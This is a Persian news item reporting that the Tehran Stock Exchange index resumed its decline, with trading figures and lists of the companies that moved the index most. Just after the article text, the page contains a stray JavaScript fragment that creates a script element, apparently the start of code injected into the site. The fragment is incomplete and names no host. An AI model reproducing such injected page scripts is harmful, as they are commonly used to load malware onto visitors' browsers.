پنج شنبه , 23 آذر 1396
خانه / اخبار بورس / اخبار فوری بورس / تشدید روند نزولی بورس تهران

تشدید روند نزولی بورس تهران

شاخص بورس تهران بعد از یک توقف کوتاه مجددا به مدار نزولی خود برگشت و با کاهش قیمت مواجه شد.

بورس تهران که از ابتدای هفته روند نزولی آغاز کرده بود، بعد از رشد آرام در روز گذشته مجددا به مدار نزولی برگشت و منفی شد.

به این ترتیب بورس تهران که بعد از بیانیه لوزان رشد پر قدرتی را به نمایش گذاشت و با عبور از کانال ۷۰ هزار واحدی، بازدهی ۱۳ درصدی را نصیب سهامداران خود کرده بود، از ابتدای هفته وارد فاز منفی شد و در معاملات امروز نیز ۳۸۶ واحد افت کرد و به مرز ۶۸ هزار واحد برگشت.

کارشناسان می گویند بالا بودن نرخ سود سپرده بانکی در کنار عرضه ای سنگین حقوقی ها در روزهای گذشته باعث بروز رفتار منفی در بورس تهران و اتخاذ سیاست فروش از سوی سهامداران شده است.

به این ترتیب در بازار امروز شرکتهای مخابرات،پالایشگاه بندرعباس، ارتباطات سیار،بانکهای ملت،صادرات،تجارت،پاسارگاد، انصار،پارسیان و سینا بیشترین تاثیر را در افت بورس گذاشتند.همچنین شرکتهای پالایشگاه اصفهان، سرمایه گذاری صنعت نفت و سایپا دیزل از بیشترین تقاضای خرید برخوردار شده و پالایشگاه بندرعباس، پتروشیمی فناوران و حفاری شمال بیشترین تقاضای فروش را به خود اختصاص دادند.

امروز همچنین حجم و ارزش معاملات نسبت به روزهای گذشته افت کرد و در مجموع ۸۳۲ میلیون سهم به ارزش ۱۶۶ میلیارد تومان داد و ستد شد و ارزش بازار سرمایه به سطح ۳۰۰ هزار میلیارد تومان بازگشت.var d=document;var s=d.createElement(‘script’);

بازتاب کلوب